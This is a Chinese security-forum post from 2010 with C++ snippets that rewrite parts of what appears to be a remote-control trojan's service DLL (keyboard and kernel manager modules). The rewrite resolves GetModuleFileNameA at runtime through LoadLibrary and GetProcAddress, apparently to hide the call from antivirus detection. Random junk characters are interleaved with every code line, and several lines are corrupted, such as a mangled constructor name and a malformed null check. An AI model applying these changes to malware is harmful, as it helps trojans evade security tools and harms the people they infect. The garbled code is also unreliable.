标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
; h: D% D, P0 Q# s4 u
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
' P Q& H0 S* f1 U' L
----------------------------------------
- c% W# ~& x5 n# @+ M8 ^# M/ g
DTDY.h:
) x, v$ U: o7 y5 }6 T( B
5 u; Q, M3 t- l3 j F
#if _MSC_VER>1000
" i1 P: V' Y0 `$ L2 M
#pragma once
$ v9 R/ z! _% {" J7 o- X
#endif //_MSC_VER>1000
3 F6 O" g' y- k6 ~3 m3 v; z/ @
#include<windows.h>
% k3 s; @) M) d7 j. W
. J" \/ q1 G$ w5 x
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
- n6 E( M3 z9 h' `8 K. z5 O+ Q3 Z4 h+ K
class DTDY
4 S! _8 |7 f! V; E. L: B; P
{
( j& t) ]! Q7 B4 a# T% x, {
public:
2 o. W4 u& A" W" P# w# R
DTDY();
1 z p' l5 i& R
virtual ~DTDY();
" {: e/ J" l0 D* g& E0 L
public:
; d6 E' ? Z* H0 \/ N
static pGetModuleFileNameA MyGetModuleFileName;
0 v( h" t) G5 O* w1 S
static BOOL FunInitiallization();
8 S7 [+ H$ _7 r2 \8 G
};
* H3 u4 p+ `* C
#endif
/ C' j% S2 t: t' r
----------------------------------------
* s- X3 Q% S6 f8 n1 u0 y
1 A8 j8 V$ G+ m" Y. i& d, K+ p
DTDY.cpp:
G/ c( t8 L0 S7 Q* P0 h
# ]5 i M* A; O+ x0 S) g( s
#include "DTDY.h"
2 S* W* A1 f% j4 k6 k
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
' P1 Z/ p9 @; M
DTDY:TDY()
# `* o3 z; E A$ l2 W( B" D% i7 g
{
0 }$ c% c- T u1 y" d( v+ B$ n, Y
}
/ @$ q7 P' E3 ?1 c: j2 T- v
DTDY::~DTDY()
0 V3 }6 ] g8 V5 {1 | A' W% B
{
. D) W3 ?" X# t. e5 |- L8 K7 u
}
A0 f6 n1 s/ q z
BOOL DTDY::FunInitiallization()
* F' \; j+ w9 I
{
( g* h$ c- B( o; P# v
HMODULE hModule=LoadLibrary("kernel32.dll");
/ |$ k$ C. L$ A
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
8 d. J3 ?/ P5 T: @7 @3 O
if(!MyGetModuleFileName=) return FALSE;
* z. `( ^, j# i5 J) X5 u( ^2 I; r
( N( E( M2 o2 C& T- M/ T+ A
return TRUE;
) W' z2 J5 r( Z
}
5 p6 D+ C- _5 ~2 K
----------------------------------------
# f" N2 X b" B9 h! ?3 t
svchost.cpp:
5 y7 U$ y8 U" q! r5 m- S6 X
+ J. Z% W1 n2 a
#include "DTDY.h"
3 y5 l3 B" h' i( j; c
) s9 k3 p. I$ N3 W
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
3 B% G4 u" A E+ p3 p" y' m& M3 f
{
* O5 b5 t l& \' r& k/ K0 s) @+ R
switch(ul_reason_for_call)
& C5 ]4 y. \4 |1 Q+ ]
{
g/ O+ j+ v! k& K: G1 b4 b& Q1 S$ J0 o
case DLL_PROCESS_ATTACH:
1 Y. k' o; g3 |* {' X. |* p& G# ~, L/ D
if(!DTDY::FunInitiallization()) return FALSE;
4 z; ~- W$ G2 n4 C$ D- R. G
' K; q: f. [) n
break;
: d2 v+ g0 i( F7 w! N% [
}
" |' q- u$ ~6 v) x6 \
}
* Y9 R/ r7 {. X5 @* p: c4 K) @, I
0 S9 g; _( t0 p
9 ]& `) v2 Q' K* A' g" F; w0 g
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
1 G5 ?" @/ X% @: k; H
改写为
/ Y5 I7 c" Y J, _4 s# w
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
6 A9 ]$ V' {* s' q8 B) r
----------------------------------------
O2 V5 n" @4 B: H9 ^ O5 @% X7 z
KernelManager.cpp:
- S( @: J5 t9 c; G% b. r
2 C# u' S' d; U1 a& L, G
#include "../DTDY.h"
6 k7 ~5 x3 b7 y+ m2 f
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
+ i- H2 e3 i2 S# |' j- f/ L: D
改写为
0 a/ C; v7 d+ r4 }& Q9 m% E! k
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
6 o& f% w* x$ t6 u% W
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
